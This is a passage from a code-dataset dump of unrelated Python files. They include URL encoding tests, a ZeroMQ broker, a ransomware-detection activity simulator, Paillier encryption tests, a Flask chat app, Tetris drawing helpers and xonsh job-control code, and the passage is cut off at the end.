_percent_pat.sub(hex_to_byte, str_bytes)\n string = str_bytes.decode(encoding, errors)\n return string\n\n# A simple implement of \"urllib.parse.unquote_plus\"\ndef percent_decode_plus(string, encoding = 'utf-8', errors = 'replace'):\n return percent_decode(string.replace('+', '%20'), encoding, errors)\n\n# A simple implement of \"urllib.parse.quote\"\ndef percent_encode(string, safe = '/', encoding = 'utf-8', errors = 'strict'):\n if not string:\n return string\n string = string.encode(encoding, errors)\n bytes_unchanged = _unreserved_chars.union(\n safe.encode('ascii', 'ignore'))\n process_byte = lambda byte: chr(byte) if byte in bytes_unchanged \\\n else '%{:02X}'.format(byte)\n return ''.join((process_byte(b) for b in string))\n\n# A simple implement of \"urllib.parse.quote_plus\"\ndef percent_encode_plus(string, safe = '', encoding = 'utf-8',\n errors = 'strict'):\n safe += ' '\n string = percent_encode(string, safe, encoding, errors)\n return string.replace(' ', '+')\n\nif __name__ == '__main__':\n import unittest\n import urllib.parse\n\n class TestURIParse(unittest.TestCase):\n def setUp(self):\n pass\n def tearDown(self):\n pass\n def doTest(self, str_, str_with_space, encoding_list):\n for en in encoding_list:\n # print('Test encoding:', en)\n\n str_enc = percent_encode(str_, encoding = en)\n self.assertEqual(\n str_enc, urllib.parse.quote(str_, encoding = en))\n\n str_with_space_enc = percent_encode_plus(\n str_with_space, encoding = en)\n self.assertEqual(\n str_with_space_enc,\n urllib.parse.quote_plus(str_with_space, encoding = en))\n\n # print('Test decoding:', en)\n self.assertEqual(percent_decode(str_enc, encoding = en),\n urllib.parse.unquote(str_enc, encoding = en))\n self.assertEqual(\n percent_decode(str_with_space_enc, encoding = en),\n urllib.parse.unquote(str_with_space_enc, encoding = en))\n self.assertEqual(\n percent_decode_plus(str_with_space_enc, encoding = en),\n urllib.parse.unquote_plus(\n str_with_space_enc, encoding = en))\n def testChinese(self):\n fn = 'Beyond-海阔天空'\n fn_with_space = 'Beyond 海 阔 天 空'\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be',\n 'gb18030')\n self.doTest(fn, fn_with_space, encoding_list)\n def testReservedChars(self):\n reserved_chars = \"!*'();:@&=+$,/?#[]\"\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be',\n 'gb18030')\n self.doTest(reserved_chars, reserved_chars, encoding_list)\n def testEmptyString(self):\n self.doTest('', '', ('utf-8', 'utf-16-be', 'utf-32-le'))\n def testURL(self):\n url = 'http://www.baidu.com/'\n url_with_space = 'http://www.baidu.com/黑 客 帝 国.rmvb'\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-32', 'utf-32-le', 'gb18030')\n self.doTest(url, url_with_space, encoding_list)\n def testFileName(self):\n file_name = '%5B%E9%81%93%E5%BE%B7%E6%83%85%E6%93%8D%E8%AE%BA%5D.%E4%B8%AD%E5%A4%AE%E7' \\\n '%BC%96%E8%AF%91%E5%87%BA%E7%89%88%E7%A4%BE%EF%BC%88%E8%B0%A2%E5%AE%97%E6%9E' \\\n '%97%E8%AF%91%29'\n self.assertEqual(percent_decode(file_name),\n urllib.parse.unquote(file_name))\n def testRealURL(self):\n wiki_page = 'http://zh.wikipedia.org/wiki/%E7%99%BE%E5%88%86%E5%8F%B7%E7%BC%96%E7%A0%81'\n self.assertEqual(percent_decode(wiki_page),\n urllib.parse.unquote(wiki_page))\n \n unittest.main()\n\n\n# References:\n# https://www.codeproject.com/Articles/7828/CHttpClient-A-Helper-Class-Using-WinInet\n# https://github.com/ProgerXP/Notepad2e/blob/master/src/Extension/StrToURL.c\n# https://github.com/bonsmile/lxd/blob/main/encoding.cpp\n","repo_name":"myd7349/Ongoing-Study","sub_path":"python/uriparse.py","file_name":"uriparse.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"74807722612","text":"import argparse\nimport zmq\nimport sys\nimport time\nfrom signal import signal, SIGINT\nfrom threading import Thread\n\nfrom zmq_api import (\n\tlisten_for_pub_data,\n\tlisten_for_pub_registration,\n\tlisten_for_sub_registration,\n\tlisten_for_pub_discovery_req,\n\tpublish_to_sub,\n\tregister_broker,\n\tdisconnect,\n)\n\nprint(f\"Current libzmq version is {zmq.zmq_version()}\")\nprint(f\"Current pyzmq version is {zmq.__version__}\")\n\nparser = argparse.ArgumentParser ()\nparser.add_argument (\"-zk\", \"--zookeeper_ip\", type=str, default=\"10.0.0.7\", help=\"Zookeeper IP Address\")\nparser.add_argument (\"-zp\", \"--zookeeper_port\", type=int, default=2181, help=\"Zookeeper Port\")\nparser.add_argument (\"-m\", \"--max_pub_count\", type=int, default=-1, help=\"Maximum number of data propagations through broker.\")\nparser.add_argument (\"-k\", \"--keep_alive\", type=int, default=-1, help=\"Time to keep the broker alive.\")\nparser.add_argument (\"-a\", \"--auto_mode\", default=False, action=\"store_true\")\nargs = parser.parse_args ()\n\nthreads = []\nterminating = False\n\ndef handler(signal_received, frame):\n\tglobal terminating\n\t# Handle any cleanup here\n\tprint('SIGINT or CTRL-C detected. Exiting gracefully')\n\tterminating = True\n\tdisconnect()\n\texit(0)\n\nsignal(SIGINT, handler)\n\ndef register_subs():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_sub_registration()\n\texcept:\n\t\tprint(\"Sub registration listener ended\")\n\n\ndef register_pubs():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_pub_registration()\n\texcept:\n\t\tprint(\"Pub registration listener ended\")\n\ndef process_discovery():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_pub_discovery_req()\n\texcept:\n\t\t\tprint(\"Pub discovery listener ended\")\n\ndef pub_data_processor():\n\tglobal terminating\n\tmax_pub_count = args.max_pub_count\n\tpub_count = 0\n\ttry:\n\t\twhile not terminating:\n\t\t# Break if we have exceeded the maximuim count\n\t\t\tif (max_pub_count != -1 and pub_count >= max_pub_count):\n\t\t\t\tprint(\"max pub count hit\")\n\t\t\t\tterminating = True\n\t\t\t\tdisconnect()\n\t\t\t\tsys.exit(0)\n\n\t\t\t\tbreak\n\t\t\t#else:\n\t\t\t#\tprint(f\"Max: {max_pub_count}, current: {pub_count}\")\n\n\t\t\treceive_pub_data()\n\t\t\tpub_count += 1\n\texcept:\n\t\tprint(\"Data propagator ended\")\t\t\t\n\ndef receive_pub_data():\n\t# Get the pub message\n\tstring = listen_for_pub_data()\n\n\tif string != None:\n\t\t# Forward published data to the appropriate subs\n\t\tpublish_to_sub(string)\n\n\n# Register broker\n#zk_ip = \"10.0.0.7\"\nzk_ip = args.zookeeper_ip\nzk_port = args.zookeeper_port\nregister_broker(zk_ip,zk_port)\n\n# Start new listener for subs\nt = Thread(target=register_subs, args=())\nt.start()\nthreads.append(t)\n\nt = Thread(target=register_pubs, args=())\nt.start()\nthreads.append(t)\n\n# Start new listener for discovery requests\nt = Thread(target=process_discovery, args=())\nt.start()\nthreads.append(t)\n\n# Start pub data listener\nt = Thread(target=pub_data_processor, args=())\nt.start()\nthreads.append(t)\n\n#if not args.auto_mode:\n\nif args.keep_alive == -1:\n\t#while True:\n\t#\tpass\n\t# Wait for input to kill the broker and terminate connections\n\tinput (\"Disconnect from the server -- Press any key to continue\")\n\tprint(\"Disconnected from the server\")\n\tterminating = True\n\tdisconnect()\n\tsys.exit(0)\nelse:\n\ttime.sleep(args.keep_alive)\n\tprint(\"Disconnected from the server\")\n\tterminating = True\n\tdisconnect()\n\tsys.exit(0)\n","repo_name":"jdunn-git/Pub-Sub-Load-Balancing","sub_path":"assignment2/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39522744692","text":"from math import ceil\nimport time\nimport random\nfrom encryption import populate_file\n\n\ndef write_net_data(n_filename, url_list):\n n_outfile = open(n_filename, 'a+')\n \n url = random.choice(url_list)\n \n n_outfile.write(url)\n n_outfile.close()\n\n\n\n\n\n\nif __name__ == '__main__':\n switch_time = 0\n\n run_default = (input('Run default? (y/n) ') == 'y')\n if run_default:\n d_filename = 'encryption/mem_data.txt'\n n_filename = 'network/net_data.txt'\n n_good_filepath = 'network/good_urls.txt'\n n_bad_filepath = 'network/bad_urls.txt'\n \n else:\n d_filename = input(\"Data Filename: \").strip()\n n_filename = input(\"Network output filename: \").strip()\n n_good_filepath = input(\"Good network file path: \").strip()\n n_bad_filepath = input(\"Bad network file path: \").strip()\n \n time_to_run = float(input(\"time to run: \").strip())*60\n attack_switch = (input('Attack switch? (y/n) ').strip() == 'y')\n if(attack_switch):\n switch_time = float(input(\"switch time: \").strip())*60\n \n\n url_list = open(n_good_filepath, 'r+').readlines()\n bad_file = open(n_bad_filepath, 'r+')\n\n attack = False\n start = time.time()\n\n while(time.time()-start < time_to_run):\n print(f\"\\rrunning: {ceil(((time.time()-start)/time_to_run)*100)}%\" , end=' ')\n \n if(not attack and attack_switch and time.time() - start > switch_time):\n print(f\"\\rSwitching to attack at\", time.strftime(\"%H:%M:%S\",time.localtime()), \"\\t\\t\\t\")\n attack = True\n bad_urls = bad_file.readlines()\n write_net_data(n_filename, bad_urls)\n url_list.extend(bad_urls)\n \n populate_file.write_file(attack=attack, filename=d_filename)\n write_net_data(n_filename,url_list)\n\n print(\"Complete!\")","repo_name":"Scottie-Fischer/ransomwaredetection_v2","sub_path":"activity_sim.py","file_name":"activity_sim.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13588422412","text":"import argparse\nimport os\nimport json\nimport SimpleITK as sitk\nfrom tqdm import tqdm\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--json_path\")\n parser.add_argument(\"--output_json_path\")\n parser.add_argument(\"--source_key\")\n parser.add_argument(\"--output_key\")\n parser.add_argument(\"--condition\")\n\n args = parser.parse_args()\n\n df = json.load(open(args.json_path))\n\n condition_key, condition_value = args.condition.split(\"==\")\n\n for key in tqdm(df):\n if args.source_key in df[key]:\n if args.output_key not in df[key]:\n if condition_key in df[key]:\n if str(df[key][condition_key]) == condition_value:\n path = df[key][args.source_key]\n image = sitk.ReadImage(path) * 0\n dir = os.sep.join(os.path.split(path)[:-1])\n output_path = f\"{dir}/mask_filled.nii.gz\"\n sitk.WriteImage(image, output_path)\n df[key][args.output_key] = output_path\n\n with open(args.output_json_path, \"w\") as o:\n json.dump(df, o, indent=2)\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"utils/fill_with_condition.py","file_name":"fill_with_condition.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"18921307067","text":"import os\nimport requests\nimport time\n\n#download method\ndef download_file(url, filename):\n ''' Downloads file from the url and save it as filename '''\n # check if file already exists\n if not os.path.isfile(filename):\n print('Downloading File')\n response = requests.get(url)\n # Check if the response is ok (200)\n if response.status_code == 200:\n # Open file and write the content\n with open(filename, 'wb') as file:\n # A chunk of 128 bytes\n for chunk in response:\n file.write(chunk)\n time.sleep(1)\n else:\n print('File exists')","repo_name":"PhilMcDaniel/rocket-league-stats","sub_path":"personal-python/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70742599733","text":"from fastapi.testclient import TestClient\n\nfrom src.schema import StatusMessage\n\nexpected_message = StatusMessage(\n power=600,\n time=60,\n state=\"off\",\n)\n\n\ndef test_status_off(clear_state):\n from src.main import app\n\n client = TestClient(app)\n response = client.get(\"/status\")\n print(response.json())\n assert response.status_code == 200\n assert response.json() == dict(expected_message)\n","repo_name":"mszpulak/roche","sub_path":"src/tests/test_status.py","file_name":"test_status.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25066230003","text":"import unittest\nimport numpy as np\nimport time\n\nimport paillier\n\n\nclass PaiTestCase(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(PaiTestCase, self).__init__(*args, **kwargs)\n self.pai = paillier.Paillier(2048, 10)\n pk, vk = self.pai.gen_key_generate_key_pair()\n self.pk = pk\n self.vk = vk\n self.row = 10\n self.col = 10\n self.value = np.random.randint(-100000, 100000, (self.row, self.col))\n self.plain = np.random.randint(-100000, 100000, (self.row * self.col,))\n\n def test_pai_batch_enc(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n self.assertEqual(cipher_text.shape[0], self.row*self.col)\n\n def test_pai_batch_dec(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # decrypt self.value\n decrypt_value = self.pai.batch_decrypt(cipher_text, self.pk, self.vk)\n self.value = self.value.astype(np.str).flatten().tolist()\n self.assertEqual(decrypt_value, self.value)\n\n def test_pai_sum(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt sum\n cipher_sum = self.pai.cipher_sum(cipher_text, self.pk)\n decrypt_sum = self.pai.decrypt(cipher_sum, self.pk, self.vk)\n self.assertEqual(decrypt_sum, np.sum(self.value).astype(np.str))\n\n def test_pai_batch_mul(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt self.value * plain\n cipher_mul_plain = self.pai.batch_mul(cipher_text, self.plain, self.pk)\n # decrypt self.value * plain\n decrypt_mul_plain = self.pai.batch_decrypt(cipher_mul_plain, self.pk, self.vk)\n for i in range(self.row):\n for j in range(self.col):\n self.assertEqual(decrypt_mul_plain[i*self.row+j], str(self.value[i][j]*self.plain[i*self.row+j]))\n\n\nclass PaiTimeTestCase(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(PaiTimeTestCase, self).__init__(*args, **kwargs)\n self.pai = paillier.Paillier(2048, 32)\n pk, vk = self.pai.gen_key_generate_key_pair()\n self.pk = pk\n self.vk = vk\n self.row = 100\n self.col = 100\n self.value = np.random.randint(-100000, 100000, (self.row, self.col))\n self.plain = np.random.randint(-100000, 100000, (self.row * self.col,))\n\n def setUp(self):\n self.startTime = time.time()\n\n def tearDown(self):\n t = time.time() - self.startTime\n print('%s: %.3f' % (self.id(), t))\n\n def test_pai_batch_enc_time(self):\n self.pai.batch_encrypt(self.value, self.pk)\n\n def test_pai_batch_dec(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # decrypt self.value\n self.startTime = time.time()\n self.pai.batch_decrypt(cipher_text, self.pk, self.vk)\n\n def test_pai_sum(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt sum\n self.startTime = time.time()\n self.pai.cipher_sum(cipher_text, self.pk)\n\n def test_pai_batch_mul(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt self.value * plain\n self.startTime = time.time()\n self.pai.batch_mul(cipher_text, self.plain, self.pk)\n\n\ndef pai_suite():\n suite = unittest.TestSuite()\n suite.addTest(PaiTestCase(\"test_pai_batch_enc\"))\n suite.addTest(PaiTestCase(\"test_pai_batch_dec\"))\n suite.addTest(PaiTestCase(\"test_pai_sum\"))\n suite.addTest(PaiTestCase(\"test_pai_batch_mul\"))\n return suite\n\n\ndef pai_time_suite():\n suite = unittest.TestSuite()\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_enc_time\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_dec\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_sum\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_mul\"))\n return suite\n\n\nif __name__ == '__main__':\n runner = unittest.TextTestRunner(verbosity=0)\n runner.run(pai_suite())\n runner.run(pai_time_suite())\n\n","repo_name":"FancyXun/federated-learning-module","sub_path":"libpts/python/api/paillier_test.py","file_name":"paillier_test.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3971761275","text":"import numpy as np\nimport scipy.linalg as la\n\n### Calculates block cholesky decomposition\n\n\ndef block_chol(L,x):\n B = x[:-1]\n d = x[-1]\n tri = la.solve_triangular(L,B,check_finite = False, lower = True)\n return(np.block([\n [L, np.zeros((len(B),1))],\n [tri,np.sqrt(d - np.dot(tri,tri))]\n ]))\n\n\n# Calculates nearest semi-positive definite matrix w.r.t. the Frobenius norm (algorithm based on Nick Higham's\n# \"Computing the nearest correlation matrix - a problem from finance\"\n\n\ndef nearestSPD(A):\n B = (A + A.T) / 2\n _, s, V = la.svd(B)\n\n H = np.dot(V.T, np.dot(np.diag(s), V))\n\n A2 = (B + H) / 2\n A3 = (A2 + A2.T) / 2\n\n if isPD(A3):\n return A3\n\n spacing = np.spacing(la.norm(A))\n\n I = np.eye(A.shape[0])\n k = 1\n while not isPD(A3):\n mineig = np.min(np.real(la.eigvals(A3)))\n A3 += I * (-mineig * k ** 2 + spacing)\n k += 1\n if la.norm(A - A3, ord='fro') / la.norm(A3, ord='fro') > 10:\n print(\"Matrix failed to be positive definite, distance in Frobenius norm: \",\n la.norm(A - A3, ord='fro') / la.norm(A3, ord='fro'))\n return A3\n\n\n### Checks if input matrix is positive definite\n\n\ndef isPD(B):\n try:\n _ = la.cholesky(B)\n return True\n except la.LinAlgError:\n return False\n","repo_name":"MatthewAlexanderFisher/LocalABC","sub_path":"LocalABC/util/lina.py","file_name":"lina.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34423077583","text":"# Framework -> Flask\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\n# funcionalidade de enviar mensagens\n@socketio.on(\"message\")\ndef gerenciar_mensagem(mensagem):\n send(mensagem, broadcast=True)\n\n\n# criar a nossa primeira pagina = 1ª rota\n@app.route(\"/\") #decorator - atribui uma funcionalidade para quem está embaixo dele, a função\ndef homepage():\n return render_template(\"homepage.html\")\n\n#roda o nosso aplicativo\nsocketio.run(app, host=\"192.168.100.2\")","repo_name":"rigsjf/rep_jornada_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36785995184","text":"import pygame, math\n\n\ndef borderOutside(surface, color, weight, x, y, w, h):\n pygame.draw.rect( surface, color, [(x-weight, y-weight), (w+weight, weight)])\n pygame.draw.rect( surface, color, [(x+w, y-weight), (weight, h+weight)])\n pygame.draw.rect( surface, color, [(x, y+h), (w+weight, weight)])\n pygame.draw.rect( surface, color, [(x-weight, y), (weight, h+weight)])\n\n\ndef pillOutside(surface, color, weight, x, y, w, h):\n ax = x-weight\n ay = y-weight\n r = h+2*weight\n lx = ax+(h+1)/2-weight\n lw = w+2*weight-h\n l2y = y+h+1-weight\n a2x = ax+lw-2*weight\n\n pygame.draw.rect( surface, color, [(lx, ay), (lw, weight)])\n pygame.draw.rect( surface, color, [(x+w, y-weight), (weight, h+weight)])\n pygame.draw.rect( surface, color, [(lx, l2y), (lw, weight)])\n pygame.draw.rect( surface, color, [(x-weight, y), (weight, h+weight)])\n pygame.draw.arc(surface, color, [(ax,ay),(r,r)], 0.5*math.pi, 1.5*math.pi, weight)\n pygame.draw.arc(surface, color, [(a2x,ay),(r,r)], 1.5*math.pi, 0.5*math.pi, weight)\n\n\ndef borderOutsideOfRect(surface, color, weight, rect):\n borderOutside(surface, color, weight, rect.left, rect.top, rect.width, rect.height)\n\n\ndef textSurface( text, font, color, loc, surf, justify = \"center\", upsideDown=False):\n t = font.render( text, True, color )\n tr = t.get_rect()\n if upsideDown:\n t = pygame.transform.flip(t, False, True)\n\n setattr( tr, justify, loc )\n surf.blit( t, tr )\n return tr\n\n\ndef textSurfaceBox( self ):\n return pygame.draw.rect(\n self.worldsurf, self.message_box_color, self.gamesurf_msg_rect, 0 )\n\n\ndef textInput(world, txt, x, y, w, h,\n focused=False, withTicks=True,\n clr1=(120,200,50), clr2 = (120,200,40)):\n\n srfc = world.worldsurf\n borderOutside(srfc, clr1, 2, x, y, w, h)\n\n if focused:\n pygame.draw.rect( srfc, clr1, [(x, y), (w, h)]) # button fill\n textSurface(txt, world.scores_font, (255,255,255), (x + w // 2, y + h // 2), srfc, \"center\")\n\n\ndef button(world, txt, x, y, w, h,\n focused=False, withTicks=True,\n clr1=(120,200,50), clr2 = (120,200,40)):\n\n srfc = world.worldsurf\n borderOutside(srfc, clr1, 2, x, y, w, h)\n\n if focused:\n pygame.draw.rect( srfc, clr1, [(x, y), (w, h)]) # button fill\n\n clr2 = world.bg_color # text and arrow color\n\n # arrows\n tx, ty, t2x = x-2, y+(h-20)/2, x+w+2\n if withTicks:\n pygame.draw.polygon(srfc, clr2, [(tx, ty), (tx+14, ty+10), (tx,ty+20)])\n pygame.draw.polygon(srfc, clr2, [(t2x, ty), (t2x-14, ty+10), (t2x,ty+20)])\n\n textSurface(txt, world.scores_font, clr2, (x+w//2, y+h//2), srfc, \"center\")\n\n\ndef verticalTab(world, txt, x, y, w, h, focused=False,\n clrFocused = (120,200,50),\n clrBlurred = (60,140,10),\n clrFocusedText = None,\n clrBlurredText = (60,140,10)\n):\n\n if clrFocusedText == None:\n clrFocusedText = world.bg_color\n if clrBlurredText == None:\n clrBlurredText = clrBlurred\n\n srfc = world.worldsurf\n marginBottom = 1\n if focused:\n h += 4\n w += 10\n y -= 2\n x -= 6\n marginBottom = -3\n pygame.draw.rect( srfc, clrFocused, [(x, y), (w, h)]) # button fill\n\n clrTxt = clrFocusedText # text and arrow color\n\n # arrows\n ty = y+(h-20)/2\n pygame.draw.polygon(srfc, clrBlurred,\n [(x-2, ty), (x+14, ty+10), (x-2,ty+20)])\n\n else:\n # pygame.draw.rect( srfc, clr1, [(x, y), (w, 2)])\n # pygame.draw.rect( srfc, clrBlurred, [(x+w, y), (1, h)])\n pygame.draw.rect( srfc, clrBlurred, [(x, y+h), (w+1, 1)])\n clrTxt = clrBlurredText\n\n textSurface(txt, world.scores_font, clrTxt, (x+w//2, y+h//2), srfc, \"center\")\n\n return y+h+marginBottom\n\n\ndef simpleText(world, text, x=-1, y=-1, color=(120,200,50), srf=None, alignment=\"center\"):\n if srf == None:\n srf = world.worldsurf\n\n return textSurface(text, world.scores_font, color, (x, y), srf, alignment)\n\n\ndef infoText(world, text, x=-1, y=-1, color=(120,200,50), srf = None):\n if x == -1 or y == -1:\n rect = world.worldsurf_rect\n if x == -1:\n x = int(rect.width/4)*3 + 15\n if y == -1:\n y = int(rect.height/2)\n\n return simpleText(world, text, x, y, color, srf, \"center\")\n\n\ndef square( self, surface, left, top, color_id , alpha = 255, gray = False):\n lvl = self.level % len( self.NES_colors )\n if self.color_mode == \"REMIX\":\n block = self.blocks[lvl][self.block_color_type[color_id - 1]]\n else:\n block = self.blocks[lvl][color_id] if not gray else self.gray_block\n\n block.set_alpha(alpha)\n surface.blit( block, ( left, top ) )\n\n\ndef blocks( self, obj, surf, rect, x = 0, y = 0, resetX = False, alpha = 255, gray = False):\n ix = x\n iy = y\n for i in obj:\n for j in i:\n if j != 0:\n square(self, surf, ix, iy, color_id = j, alpha = alpha, gray = gray )\n ix += self.side\n if resetX:\n ix = 0\n else:\n ix = x\n iy += self.side\n\n if self.inverted:\n self.worldsurf.blit( pygame.transform.flip(surf, False, True), rect)\n else:\n self.worldsurf.blit( surf, rect )\n\n\n#draw the underlying game board the current zoid interacts with\ndef board( self, alpha = 255):\n echo = (\n (self.board_echo_placed and self.are_counter > 0) or\n (self.board_echo_lc and self.lc_counter > 0)\n )\n\n if self.visible_board or echo:\n\n if not self.board_mask or not self.mask_toggle:\n if self.dimtris and not echo:\n alpha = self.dimtris_alphas[min(self.level, len(self.dimtris_alphas)-1)]\n\n blocks(\n self, self.board, self.gamesurf, self.gamesurf_rect,\n resetX = True, alpha = alpha, gray = self.gray_board\n )\n\n else:\n self.gamesurf.fill( self.mask_color )\n self.worldsurf.blit( self.gamesurf , self.gamesurf_rect)\n","repo_name":"jack13berry/metatris","sub_path":"py-metatris/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26128371292","text":"from Board import Board\nfrom pathlib import Path\nfrom abc import ABC, abstractmethod\n\nclass SearchAlgo(ABC):\n def __init__(self, board: Board, max_depth: int, index: int):\n self.board = board\n self.max_depth = max_depth\n\n # File creation\n Path(\"Outputs\").mkdir(parents=True, exist_ok=True)\n\n algo_name = type(self).__name__.lower()\n\n # Search file\n file_name_dfs_search = \"Outputs/\" + str(index) + \"_\" + algo_name + \"_search.txt\"\n self.search_file = open(file_name_dfs_search, \"w+\")\n\n # Solution file\n file_name_dfs_solution = \"Outputs/\" + str(index) + \"_\" + algo_name + \"_solution.txt\"\n self.solution_file = open(file_name_dfs_solution, \"w+\")\n\n def populate_solution_file(self, board: Board):\n solution_list = []\n key_value_pair = {board.getPosition(board.touch_idx): board.puzzle_config}\n solution_list.append(key_value_pair)\n\n while not board.isRoot():\n board = board.parent\n key_value_pair = {board.getPosition(board.touch_idx): board.puzzle_config}\n solution_list.append(key_value_pair)\n\n solution_list.reverse()\n\n first_flag = True\n for pair in solution_list:\n position = list(pair.keys())[0]\n config = list(pair.values())[0]\n\n if first_flag:\n self.solution_file.write(\"0 \" + config + \"\\n\")\n first_flag = False\n else:\n self.solution_file.write(str(position) + \" \" + config + \"\\n\")\n\n self.solution_file.close()\n\n @abstractmethod\n def search(self):\n pass\n\n @abstractmethod\n def update_and_sort_open_list(self, b:Board, open_list):\n pass\n\n def getSearchOutput(self, g, h, board):\n return \"{}\\t{}\\t{}\\t{}\".format(int(g+h), g, h, board)\n","repo_name":"tarekait1996/IndonesianDotPuzzle","sub_path":"SearchAlgo.py","file_name":"SearchAlgo.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73030671733","text":"\"\"\"\nJob control for the xonsh shell.\n\"\"\"\nimport os\nimport sys\nimport time\nimport signal\nimport builtins\nfrom subprocess import TimeoutExpired\n\nfrom xonsh.tools import ON_WINDOWS\n\ntry:\n _shell_tty = sys.stderr.fileno()\nexcept OSError:\n _shell_tty = None\n\n\nif ON_WINDOWS:\n def _continue(obj):\n return None\n\n\n def _kill(obj):\n return obj.kill()\n\n\n def ignore_sigtstp():\n pass\n\n\n def _set_pgrp(info):\n pass\n\n def wait_for_active_job(signal_to_send=None):\n \"\"\"\n Wait for the active job to finish, to be killed by SIGINT, or to be\n suspended by ctrl-z.\n \"\"\"\n _clear_dead_jobs()\n act = builtins.__xonsh_active_job__\n if act is None:\n return\n job = builtins.__xonsh_all_jobs__[act]\n obj = job['obj']\n if job['bg']:\n return\n while obj.returncode is None:\n try:\n obj.wait(0.01)\n except TimeoutExpired:\n pass\n except KeyboardInterrupt:\n obj.kill()\n if obj.poll() is not None:\n builtins.__xonsh_active_job__ = None\n\nelse:\n def _continue(obj):\n return signal.SIGCONT\n\n\n def _kill(obj):\n os.kill(obj.pid, signal.SIGKILL)\n\n\n def ignore_sigtstp():\n signal.signal(signal.SIGTSTP, signal.SIG_IGN)\n\n\n def _set_pgrp(info):\n try:\n info['pgrp'] = os.getpgid(info['obj'].pid)\n except ProcessLookupError:\n pass\n\n\n _shell_pgrp = os.getpgrp()\n\n _block_when_giving = (signal.SIGTTOU, signal.SIGTTIN, signal.SIGTSTP)\n\n\n def _give_terminal_to(pgid):\n # over-simplified version of:\n # give_terminal_to from bash 4.3 source, jobs.c, line 4030\n # this will give the terminal to the process group pgid\n if _shell_tty is not None and os.isatty(_shell_tty):\n oldmask = signal.pthread_sigmask(signal.SIG_BLOCK, _block_when_giving)\n os.tcsetpgrp(_shell_tty, pgid)\n signal.pthread_sigmask(signal.SIG_SETMASK, oldmask)\n\n\n def wait_for_active_job(signal_to_send=None):\n \"\"\"\n Wait for the active job to finish, to be killed by SIGINT, or to be\n suspended by ctrl-z.\n \"\"\"\n _clear_dead_jobs()\n act = builtins.__xonsh_active_job__\n if act is None:\n return\n job = builtins.__xonsh_all_jobs__[act]\n obj = job['obj']\n if job['bg']:\n return\n pgrp = job['pgrp']\n obj.done = False\n\n # give the terminal over to the fg process\n _give_terminal_to(pgrp)\n # if necessary, send the specified signal to this process\n # (this hook was added because vim, emacs, etc, seem to need to have\n # the terminal when they receive SIGCONT from the \"fg\" command)\n if signal_to_send is not None:\n os.kill(obj.pid, signal_to_send)\n _, s = os.waitpid(obj.pid, os.WUNTRACED)\n if os.WIFSTOPPED(s):\n obj.done = True\n job['bg'] = True\n job['status'] = 'stopped'\n print() # get a newline because ^Z will have been printed\n print_one_job(act)\n elif os.WIFSIGNALED(s):\n print() # get a newline because ^C will have been printed\n if obj.poll() is not None:\n builtins.__xonsh_active_job__ = None\n _give_terminal_to(_shell_pgrp) # give terminal back to the shell\n\n\ndef _clear_dead_jobs():\n to_remove = set()\n for num, job in 